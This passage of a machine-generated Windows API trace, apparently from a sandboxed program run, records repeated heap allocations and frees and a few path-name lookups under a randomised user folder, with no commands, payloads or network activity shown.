(HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0197.151] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0197.151] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.151] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0197.151] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0197.151] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0197.152] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.152] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0197.152] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0197.152] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0197.152] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.153] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0197.153] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0197.153] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0197.153] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.154] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0197.154] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0197.154] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0197.154] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.155] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0197.155] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0197.155] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0197.155] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2aeaea0 [0197.155] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.155] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeaea0 | out: hHeap=0x2c0000) returned 1 [0197.156] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0197.156] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0197.156] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0197.156] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.156] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0197.156] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0197.156] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0197.156] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2aeaea0 [0197.157] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.157] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeaea0 | out: hHeap=0x2c0000) returned 1 [0197.157] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0197.157] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0197.157] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0197.157] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.158] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0197.158] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0197.158] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0197.158] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.158] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0197.159] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0197.159] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0197.159] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.159] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0197.159] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0197.159] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0197.160] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.160] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0197.160] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0197.160] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0197.160] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2aeaea0 [0197.160] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.161] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeaea0 | out: hHeap=0x2c0000) returned 1 [0197.161] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0197.161] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0197.161] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0197.162] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.162] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0197.162] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0197.162] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0197.162] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.162] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0197.162] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0197.162] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0197.163] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.163] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0197.163] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0197.163] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0197.163] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.164] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0197.164] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0197.164] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0197.164] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.164] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0197.164] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0197.165] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0197.165] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.165] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0197.165] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0197.165] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0197.166] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.166] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0197.166] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0197.166] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0197.166] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.167] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0197.167] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0197.167] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0197.167] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.167] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0197.167] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0197.167] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0197.167] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2aeaea0 [0197.168] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.168] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeaea0 | out: hHeap=0x2c0000) returned 1 [0197.168] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0197.168] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0197.168] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0197.169] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.169] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0197.169] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0197.169] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0197.170] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.170] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0197.170] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0197.170] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0197.170] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.170] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0197.170] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0197.171] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0197.171] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.171] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0197.171] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0197.171] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0197.171] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.172] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0197.172] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0197.172] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0197.172] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2aeaea0 [0197.172] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.173] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeaea0 | out: hHeap=0x2c0000) returned 1 [0197.173] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0197.173] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0197.173] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0197.174] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.174] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0197.174] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0197.174] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0197.174] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.175] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0197.175] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0197.175] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0197.175] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.175] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0197.175] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0197.175] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0197.176] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.176] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0197.176] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0197.176] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0197.176] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.177] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0197.177] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0197.177] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0197.177] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.177] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0197.177] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0197.177] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0197.178] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.178] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0197.178] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0197.178] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0197.179] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.179] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0197.179] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0197.179] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0197.180] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.180] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0197.180] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0197.180] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0197.180] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2aeaea0 [0197.181] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.181] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeaea0 | out: hHeap=0x2c0000) returned 1 [0197.181] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0197.181] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0197.181] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0197.182] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.182] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0197.182] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0197.182] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0197.183] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.183] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0197.183] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0197.183] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0197.183] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.184] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0197.184] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0197.184] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0197.184] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.184] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0197.184] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0197.184] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0197.185] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.185] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0197.185] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0197.185] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0197.185] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2aeaea0 [0197.185] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.186] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeaea0 | out: hHeap=0x2c0000) returned 1 [0197.186] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0197.186] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0197.186] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0197.186] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.187] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0197.187] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0197.187] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0197.187] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.187] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0197.187] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0197.187] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0197.188] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.188] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0197.188] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0197.188] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0197.188] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.189] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0197.189] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0197.189] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0197.189] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.189] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0197.189] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0197.189] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0197.190] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.190] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0197.190] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0197.190] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\8NNLi0kOEoM-mpUM785\\ySw9UDFA\\") returned="ySw9UDFA\\" [0197.190] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7a40 [0197.190] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbbc0 [0197.190] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0197.191] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\8NNLi0kOEoM-mpUM785\\") returned="8NNLi0kOEoM-mpUM785\\" [0197.191] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0197.191] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0197.191] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2aea650 [0197.191] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbbc0 | out: hHeap=0x2c0000) returned 1 [0197.191] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\") returned="Documents\\" [0197.191] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0197.192] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aea650 | out: hHeap=0x2c0000) returned 1 [0197.192] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0197.192] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7a40 [0197.192] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0197.192] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0197.193] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0197.193] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0197.193] PathFindFileNameW (pszPath="") returned="" [0197.193] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0197.193] 